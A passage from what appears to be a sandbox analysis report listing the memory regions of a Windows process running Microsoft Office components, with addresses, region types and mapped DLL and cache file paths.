name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 386
start_va = 0x7feffa40000
end_va = 0x7feffc42fff
entry_point = 0x7feffa40000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 387
start_va = 0x7feffc50000
end_va = 0x7feffd7cfff
entry_point = 0x7feffc50000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 388
start_va = 0x7feffd80000
end_va = 0x7feffe56fff
entry_point = 0x7feffd80000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 389
start_va = 0x7feffe60000
end_va = 0x7feffeb1fff
entry_point = 0x7feffe60000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 390
start_va = 0x7feffec0000
end_va = 0x7feffec7fff
entry_point = 0x7feffec0000
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 391
start_va = 0x7fefff60000
end_va = 0x7fefff60fff
entry_point = 0x7fefff60000
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 392
start_va = 0x7fffff60000
end_va = 0x7fffff6ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff60000"
filename = ""
Region:
id = 393
start_va = 0x7fffff70000
end_va = 0x7fffff7ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff70000"
filename = ""
Region:
id = 394
start_va = 0x7fffff8c000
end_va = 0x7fffff8dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8c000"
filename = ""
Region:
id = 395
start_va = 0x7fffff8e000
end_va = 0x7fffff8ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8e000"
filename = ""
Region:
id = 396
start_va = 0x7fffff90000
end_va = 0x7fffff91fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff90000"
filename = ""
Region:
id = 397
start_va = 0x7fffff92000
end_va = 0x7fffff93fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff92000"
filename = ""
Region:
id = 398
start_va = 0x7fffff94000
end_va = 0x7fffff95fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff94000"
filename = ""
Region:
id = 399
start_va = 0x7fffff96000
end_va = 0x7fffff97fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff96000"
filename = ""
Region:
id = 400
start_va = 0x7fffff98000
end_va = 0x7fffff99fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff98000"
filename = ""
Region:
id = 401
start_va = 0x7fffff9a000
end_va = 0x7fffff9bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9a000"
filename = ""
Region:
id = 402
start_va = 0x7fffff9c000
end_va = 0x7fffff9dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9c000"
filename = ""
Region:
id = 403
start_va = 0x7fffff9e000
end_va = 0x7fffff9ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff9e000"
filename = ""
Region:
id = 404
start_va = 0x7fffffa0000
end_va = 0x7fffffa1fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa0000"
filename = ""
Region:
id = 405
start_va = 0x7fffffa2000
end_va = 0x7fffffa3fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa2000"
filename = ""
Region:
id = 406
start_va = 0x7fffffa4000
end_va = 0x7fffffa5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa4000"
filename = ""
Region:
id = 407
start_va = 0x7fffffa6000
end_va = 0x7fffffa7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa6000"
filename = ""
Region:
id = 408
start_va = 0x7fffffa8000
end_va = 0x7fffffa9fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffa8000"
filename = ""
Region:
id = 409
start_va = 0x7fffffaa000
end_va = 0x7fffffabfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffaa000"
filename = ""
Region:
id = 410
start_va = 0x7fffffac000
end_va = 0x7fffffadfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffac000"
filename = ""
Region:
id = 411
start_va = 0x7fffffae000
end_va = 0x7fffffaffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffae000"
filename = ""
Region:
id = 412
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 413
start_va = 0x7fffffd4000
end_va = 0x7fffffd5fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd4000"
filename = ""
Region:
id = 414
start_va = 0x7fffffd8000
end_va = 0x7fffffd8fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd8000"
filename = ""
Region:
id = 415
start_va = 0x7fffffda000
end_va = 0x7fffffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffda000"
filename = ""
Region:
id = 416
start_va = 0x7fffffdc000
end_va = 0x7fffffddfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdc000"
filename = ""
Region:
id = 417
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 418
start_va = 0x5d0000
end_va = 0x5d0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005d0000"
filename = ""
Region:
id = 419
start_va = 0x7fee46e0000
end_va = 0x7fee4799fff
entry_point = 0x7fee46e0000
region_type = mapped_file
name = "uiautomationcore.dll"
filename = "\\Windows\\System32\\UIAutomationCore.dll" (normalized: "c:\\windows\\system32\\uiautomationcore.dll")
Region:
id = 420
start_va = 0x7fef3ed0000
end_va = 0x7fef3f23fff
entry_point = 0x7fef3ed0000
region_type = mapped_file
name = "oleacc.dll"
filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll")
Region:
id = 421
start_va = 0x5e0000
end_va = 0x5e0fff
entry_point = 0x5e0000
region_type = mapped_file
name = "oleaccrc.dll"
filename = "\\Windows\\System32\\oleaccrc.dll" (normalized: "c:\\windows\\system32\\oleaccrc.dll")
Region:
id = 422
start_va = 0x7fefda90000
end_va = 0x7fefdb20fff
entry_point = 0x7fefda90000
region_type = mapped_file
name = "sxs.dll"
filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll")
Region:
id = 423
start_va = 0x745d0000
end_va = 0x745d2fff
entry_point = 0x745d0000
region_type = mapped_file
name = "sfc.dll"
filename = "\\Windows\\System32\\sfc.dll" (normalized: "c:\\windows\\system32\\sfc.dll")
Region:
id = 424
start_va = 0x7fef6fc0000
end_va = 0x7fef6fcffff
entry_point = 0x7fef6fc0000
region_type = mapped_file
name = "sfc_os.dll"
filename = "\\Windows\\System32\\sfc_os.dll" (normalized: "c:\\windows\\system32\\sfc_os.dll")
Region:
id = 425
start_va = 0x7fee3da0000
end_va = 0x7fee46dcfff
entry_point = 0x7fee3da0000
region_type = mapped_file
name = "csi.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\Csi.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\csi.dll")
Region:
id = 426
start_va = 0x7fefba20000
end_va = 0x7fefba4ffff
entry_point = 0x7fefba20000
region_type = mapped_file
name = "peerdist.dll"
filename = "\\Windows\\System32\\PeerDist.dll" (normalized: "c:\\windows\\system32\\peerdist.dll")
Region:
id = 427
start_va = 0x7fefd670000
end_va = 0x7fefd69efff
entry_point = 0x7fefd670000
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 428
start_va = 0x5f0000
end_va = 0x5fffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 429
start_va = 0x2440000
end_va = 0x244ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002440000"
filename = ""
Region:
id = 430
start_va = 0x2c70000
end_va = 0x2d6ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002c70000"
filename = ""
Region:
id = 431
start_va = 0x7fef3020000
end_va = 0x7fef308bfff
entry_point = 0x7fef3020000
region_type = mapped_file
name = "aceoledb.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACEOLEDB.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\aceoledb.dll")
Region:
id = 432
start_va = 0x2450000
end_va = 0x2451fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002450000"
filename = ""
Region:
id = 433
start_va = 0x7fee3c90000
end_va = 0x7fee3d9dfff
entry_point = 0x7fee3c90000
region_type = mapped_file
name = "oledb32.dll"
filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32.dll")
Region:
id = 434
start_va = 0x7fef92f0000
end_va = 0x7fef9317fff
entry_point = 0x7fef92f0000
region_type = mapped_file
name = "msdart.dll"
filename = "\\Windows\\System32\\msdart.dll" (normalized: "c:\\windows\\system32\\msdart.dll")
Region:
id = 435
start_va = 0xb000000
end_va = 0xb07ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b000000"
filename = ""
Region:
id = 436
start_va = 0x75830000
end_va = 0x75843fff
entry_point = 0x75830000
region_type = mapped_file
name = "oledb32r.dll"
filename = "\\Program Files\\Common Files\\System\\Ole DB\\oledb32r.dll" (normalized: "c:\\program files\\common files\\system\\ole db\\oledb32r.dll")
Region:
id = 437
start_va = 0x7fee3a40000
end_va = 0x7fee3c86fff
entry_point = 0x7fee3a40000
region_type = mapped_file
name = "acecore.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACECORE.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\acecore.dll")
Region:
id = 438
start_va = 0xae90000
end_va = 0xaf8ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000ae90000"
filename = ""
Region:
id = 439
start_va = 0xb080000
end_va = 0xf07ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000b080000"
filename = ""
Region:
id = 440
start_va = 0xf0e0000
end_va = 0xf1dffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f0e0000"
filename = ""
Region:
id = 441
start_va = 0xf200000
end_va = 0xf2fffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f200000"
filename = ""
Region:
id = 442
start_va = 0x7fee3960000
end_va = 0x7fee3a38fff
entry_point = 0x7fee3960000
region_type = mapped_file
name = "acewstr.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\ACEWSTR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\acewstr.dll")
Region:
id = 443
start_va = 0x7fffff88000
end_va = 0x7fffff89fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff88000"
filename = ""
Region:
id = 444
start_va = 0x7fffff8a000
end_va = 0x7fffff8bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff8a000"
filename = ""
Region:
id = 445
start_va = 0x7fffffd6000
end_va = 0x7fffffd7fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd6000"
filename = ""
Region:
id = 446
start_va = 0x2500000
end_va = 0x250ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002500000"
filename = ""
Region:
id = 447
start_va = 0x2510000
end_va = 0x251ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002510000"
filename = ""
Region:
id = 448
start_va = 0x7fef9360000
end_va = 0x7fef936ffff
entry_point = 0x7fef9360000
region_type = mapped_file
name = "aceerr.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACEERR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\aceerr.dll")
Region:
id = 449
start_va = 0x7fef3740000
end_va = 0x7fef3775fff
entry_point = 0x7fef3740000
region_type = mapped_file
name = "aceintl.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\1033\\aceintl.dll")
Region:
id = 450
start_va = 0x7fee3880000
end_va = 0x7fee3959fff
entry_point = 0x7fee3880000
region_type = mapped_file
name = "acees.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\ACEES.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\acees.dll")
Region:
id = 451
start_va = 0x75750000
end_va = 0x75821fff
entry_point = 0x75750000
region_type = mapped_file
name = "msvcr100.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\System\\msvcr100.dll" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\system\\msvcr100.dll")
Region:
id = 452
start_va = 0x7fef9350000
end_va = 0x7fef9357fff
entry_point = 0x7fef9350000
region_type = mapped_file
name = "vbajet32.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\VBAJET32.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\vbajet32.dll")
Region:
id = 453
start_va = 0x46c0000
end_va = 0x47bffff
entry_point = 0x0
region_type = private
name = "private_0x00000000046c0000"
filename = ""
Region:
id = 454
start_va = 0xf4c0000
end_va = 0xf4cffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f4c0000"
filename = ""
Region:
id = 455
start_va = 0x7fef2fa0000
end_va = 0x7fef3019fff
entry_point = 0x7fef2fa0000
region_type = mapped_file
name = "expsrv.dll"
filename = "\\Program Files\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\EXPSRV.DLL" (normalized: "c:\\program files\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\expsrv.dll")
Region:
id = 732
start_va = 0x2510000
end_va = 0x2519fff
entry_point = 0x2510000
region_type = mapped_file
name = "normnfd.nls"
filename = "\\Windows\\System32\\normnfd.nls" (normalized: "c:\\windows\\system32\\normnfd.nls")
Region:
id = 733
start_va = 0x2a40000
end_va = 0x2a4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a40000"
filename = ""
Region:
id = 734
start_va = 0x2a60000
end_va = 0x2a6ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002a60000"
filename = ""
Region:
id = 735
start_va = 0x2a70000
end_va = 0x2aaffff
entry_point = 0x2a70000
region_type = mapped_file
name = "index.dat"
filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Windows\\IETldCache\\index.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\microsoft\\windows\\ietldcache\\index.dat")
Region:
id = 736
start_va = 0x84f0000
end_va = 0x85effff
entry_point = 0x0
region_type = private
name = "private_0x00000000084f0000"
filename = ""
Region:
id = 737
start_va = 0xaee0000
end_va = 0xafdffff
entry_point = 0x0
region_type = private
name = "private_0x000000000aee0000"
filename = ""
Region:
id = 738
start_va = 0xf0c0000
end_va = 0xf1bffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f0c0000"
filename = ""
Region:
id = 739
start_va = 0xf1e0000
end_va = 0xf2dffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f1e0000"
filename = ""
Region:
id = 740
start_va = 0xf390000
end_va = 0xf48ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f390000"
filename = ""
Region:
id = 741
start_va = 0xf590000
end_va = 0xf68ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f590000"
filename = ""
Region:
id = 742
start_va = 0x7fefd210000
end_va = 0x7fefd266fff
entry_point = 0x7fefd210000
region_type = mapped_file
name = "schannel.dll"
filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll")
Region:
id = 743
start_va = 0x7fffff82000
end_va = 0x7fffff83fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff82000"
filename = ""
Region:
id = 744
start_va = 0x7fffff84000
end_va = 0x7fffff85fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff84000"
filename = ""
Region:
id = 745
start_va = 0x7fffff86000
end_va = 0x7fffff87fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff86000"
filename = ""
Region:
id = 746
start_va = 0x2a50000
end_va = 0x2a51fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a50000"
filename = ""
Region:
id = 747
start_va = 0x2d90000
end_va = 0x2d91fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002d90000"
filename = ""
Region:
id = 748
start_va = 0xf7f0000
end_va = 0xf8effff
entry_point = 0x0
region_type = private
name = "private_0x000000000f7f0000"
filename = ""
Region:
id = 749
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
entry_point = 0x7fefcf10000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 750
start_va = 0x7fffff80000
end_va = 0x7fffff81fff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff80000"
filename = ""
Region:
id = 751
start_va = 0xfa60000
end_va = 0xfb5ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000fa60000"
filename = ""
Region:
id = 752
start_va = 0xfb60000
end_va = 0x10b2ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000fb60000"
filename = ""
Region:
id = 753
start_va = 0x7fee3760000
end_va = 0x7fee387efff
entry_point = 0x7fee3760000
region_type = mapped_file
name = "webservices.dll"
filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll")
Region:
id = 754
start_va = 0x7fffff5e000
end_va = 0x7fffff5ffff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5e000"
filename = ""
Region:
id = 768
start_va = 0xf690000
end_va = 0xf78ffff
entry_point = 0x0
region_type = private
name = "private_0x000000000f690000"
filename = ""
Region:
id = 769
start_va = 0x7fef92e0000
end_va = 0x7fef92e9fff
entry_point = 0x7fef92e0000
region_type = mapped_file
name = "davhlpr.dll"
filename = "\\Windows\\System32\\davhlpr.dll" (normalized: "c:\\windows\\system32\\davhlpr.dll")
Region:
id = 770
start_va = 0x2520000
end_va = 0x2520fff
entry_point = 0x0
region_type = private
name = "private_0x0000000002520000"
filename = ""
Region:
id = 771
start_va = 0x2f70000
end_va = 0x2f8afff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f70000"
filename = ""
Region:
id = 772
start_va = 0x7fef2f80000
end_va = 0x7fef2f9dfff
entry_point = 0x7fef2f80000
region_type = mapped_file
name = "hlink.dll"
filename = "\\Windows\\System32\\hlink.dll" (normalized: "c:\\windows\\system32\\hlink.dll")
Region:
id = 773
start_va = 0x2a50000
end_va = 0x2a50fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a50000"
filename = ""
Region:
id = 774
start_va = 0x2a60000
end_va = 0x2a60fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000002a60000"
filename = ""
Region:
id = 775
start_va = 0x2e40000
end_va = 0x2e4ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002e40000"
filename = ""
Region:
id = 776
start_va = 0x2f90000
end_va = 0x2fa0fff
entry_point = 0x2f90000
region_type = mapped_file
name = "c_20127.nls"
filename = "\\Windows\\System32\\C_20127.NLS" (normalized: "c:\\windows\\system32\\c_20127.nls")
Region:
id = 777
start_va = 0x3890000
end_va = 0x390ffff
entry_point = 0x3890000
region_type = mapped_file
name = "~wrf{71e4198e-2085-4a6c-853f-05588a259779}.tmp"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.Word\\~WRF{71E4198E-2085-4A6C-853F-05588A259779}.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.word\\~wrf{71e4198e-2085-4a6c-853f-05588a259779}.tmp")
Region:
id = 778
start_va = 0xf8f0000
end_va = 0xf9effff
entry_point = 0x0
region_type = private
name = "private_0x000000000f8f0000"
filename = ""
Region:
id = 779
start_va = 0x10bd0000
end_va = 0x10ccffff
entry_point = 0x0
region_type = private
name = "private_0x0000000010bd0000"
filename = ""
Region:
id = 780
start_va = 0x756a0000
end_va = 0x75742fff
entry_point = 0x756a0000
region_type = mapped_file
name = "msvcr90.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_08e61857a83bc251\\msvcr90.dll")
Region:
id = 781
start_va = 0x7fee30b0000
end_va = 0x7fee315cfff
entry_point = 0x7fee30b0000
region_type = mapped_file
name = "outlfltr.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\OUTLFLTR.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\outlfltr.dll")
Region:
id = 782
start_va = 0x7fffff5a000
end_va = 0x7fffff5bfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5a000"
filename = ""
Region:
id = 783
start_va = 0x7fffff5c000
end_va = 0x7fffff5dfff
entry_point = 0x0
region_type = private
name = "private_0x000007fffff5c000"
filename = ""
Region:
id = 784
start_va = 0x3160000
end_va = 0x3164fff
entry_point = 0x0
region_type = private
name = "private_0x0000000003160000"
filename = ""
Region:
id = 785
start_va = 0x3170000
end_va = 0x317ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003170000"
filename = ""
Region:
id = 786
start_va = 0x3180000
end_va = 0x3180fff
entry_point = 0x0
region_type = private
name = "private_0x0000000003180000"
filename = ""
Region:
id = 787
start_va = 0x3910000
end_va = 0x393ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003910000"
filename = ""
Region:
id = 788
start_va = 0x3940000
end_va = 0x3944fff
entry_point = 0x0
region_type = private
name = "private_0x0000000003940000"
filename = ""
Region:
id = 789
start_va = 0x3950000
end_va = 0x395ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003950000"
filename = ""
Region:
id = 790
start_va = 0x3960000
end_va = 0x3960fff
entry_point = 0x0
region_type = private
name = "private_0x0000000003960000"
filename = ""
Region:
id = 791
start_va = 0x3b70000
end_va = 0x3b9ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b70000"
filename = ""
Region:
id = 792
start_va = 0x3ba0000
end_va = 0x3baffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ba0000"
filename = ""
Region:
id = 793
start_va = 0x3bb0000
end_va = 0x3bbffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003bb0000"
filename = ""
Region:
id = 794
start_va = 0x3bc0000
end_va = 0x3bcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003bc0000"
filename = ""
Region:
id = 795
start_va = 0x3bd0000
end_va = 0x3bdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003bd0000"
filename = ""
Region:
id = 796
start_va = 0x3be0000
end_va = 0x3beffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003be0000"
filename = ""
Region:
id = 797
start_va = 0x10cd0000
end_va = 0x10dcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000010cd0000"
filename = ""
Region:
id = 798
start_va = 0x10e00000
end_va = 0x10e0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000010e00000"
filename = ""
Region:
id = 799
start_va = 0x7fee30a0000
end_va = 0x7fee30acfff
entry_point = 0x7fee30a0000
region_type = mapped_file
name = "idndl.dll"
filename = "\\Windows\\System32\\idndl.dll" (normalized: "c:\\windows\\system32\\idndl.dll")
Region:
id = 2152
start_va = 0x3bf0000
end_va = 0x3bfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003bf0000"
filename = ""
Region:
id = 2153
start_va = 0x3c00000
end_va = 0x3c0ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c00000"
filename = ""
Region:
id = 2154
start_va = 0x3c10000
end_va = 0x3c1ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c10000"
filename = ""
Region:
id = 2155
start_va = 0x3d30000
end_va = 0x3d30fff
entry_point = 0x3d30000
region_type = mapped_file
name = "b958bd1d.wmf"
filename = "\\Users\\aETAdzjz\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.MSO\\B958BD1D.wmf" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.mso\\b958bd1d.wmf")
Region:
id = 2156
start_va = 0x3d40000
end_va = 0x3d41fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000003d40000"
filename = ""
Region:
id = 2157
start_va = 0x41d0000
end_va = 0x41d1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041d0000"
filename = ""
Region:
id = 2158
start_va = 0x7fee24f0000
end_va = 0x7fee2968fff
entry_point = 0x7fee24f0000
region_type = mapped_file
name = "gfx.dll"
filename = "\\Program Files\\Microsoft Office\\root\\Office16\\GFX.DLL" (normalized: "c:\\program files\\microsoft office\\root\\office16\\gfx.dll")
Region:
id = 2159
start_va = 0x7fef8360000
end_va = 0x7fef8366fff
entry_point = 0x7fef8360000
region_type = mapped_file
name = "msimg32.dll"
filename = "\\Windows\\System32\\msimg32.dll" (normalized: "c:\\windows\\system32\\msimg32.dll")
Region:
id = 2219
start_va = 0x5670000
end_va = 0x5736fff
entry_point = 0x5670000
region_type = mapped_file
name = "calibri.ttf"
filename = "\\Windows\\Fonts\\calibri.ttf" (normalized: "c:\\windows\\fonts\\calibri.ttf")
Region:
id = 2220
start_va = 0x10e10000
end_va = 0x1129dfff
entry_point = 0x0
region_type = private
name = "private_0x0000000010e10000"
filename = ""
Region:
id = 2221
start_va = 0x7fef8e40000
end_va = 0x7fef8e4bfff
entry_point = 0x7fef8e40000
region_type = mapped_file
name = "linkinfo.dll"
filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll")
Region:
id = 2222
start_va = 0x7fef9b40000
end_va = 0x7fef9bbffff
entry_point = 0x7fef9b40000
region_type = mapped_file
name = "ntshrui.dll"
filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll")
Region:
id = 2223
start_va = 0x7fef9bc0000
end_va = 0x7fef9bcefff
entry_point = 0x7fef9bc0000
region_type = mapped_file
name = "cscapi.dll"
filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll")
Region:
id = 2224
start_va = 0x7fefb730000
end_va = 0x7fefb73afff
entry_point = 0x7fefb730000
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 2268
start_va = 0x112a0000
end_va = 0x11651fff
entry_point = 0x0
region_type = private
name = "private_0x00000000112a0000"
filename = ""
Region:
id = 2269
start_va = 0x7fefb340000
end_va = 0x7fefb396fff
entry_point = 0x7fefb340000
region_type = mapped_file
name = "apphelp.dll"
filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll")
Region:
id = 2270
start_va = 0x7fef3f30000
end_va = 0x7fef4ae6fff
entry_point = 0x7fef3f30000
region_type = mapped_file
name = "ieframe.dll"
filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll")
Region:
id = 2326
start_va = 0x41e0000
end_va = 0x41e1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000041e0000"
filename = ""
Region:
id = 2327
start_va = 0x41f0000
end_va = 0x41f3fff
entry_point = 0x41f0000
region_type = mapped_file
name = "cversions.2.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db")
Region:
id = 2328
start_va = 0x4200000
end_va = 0x422ffff
entry_point = 0x4200000
region_type = mapped_file
name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db"
filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001c.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db")
Region:
id = 2329
start_va = 0x4230000
end_va = 0x4233fff
entry_point = 0x4230000
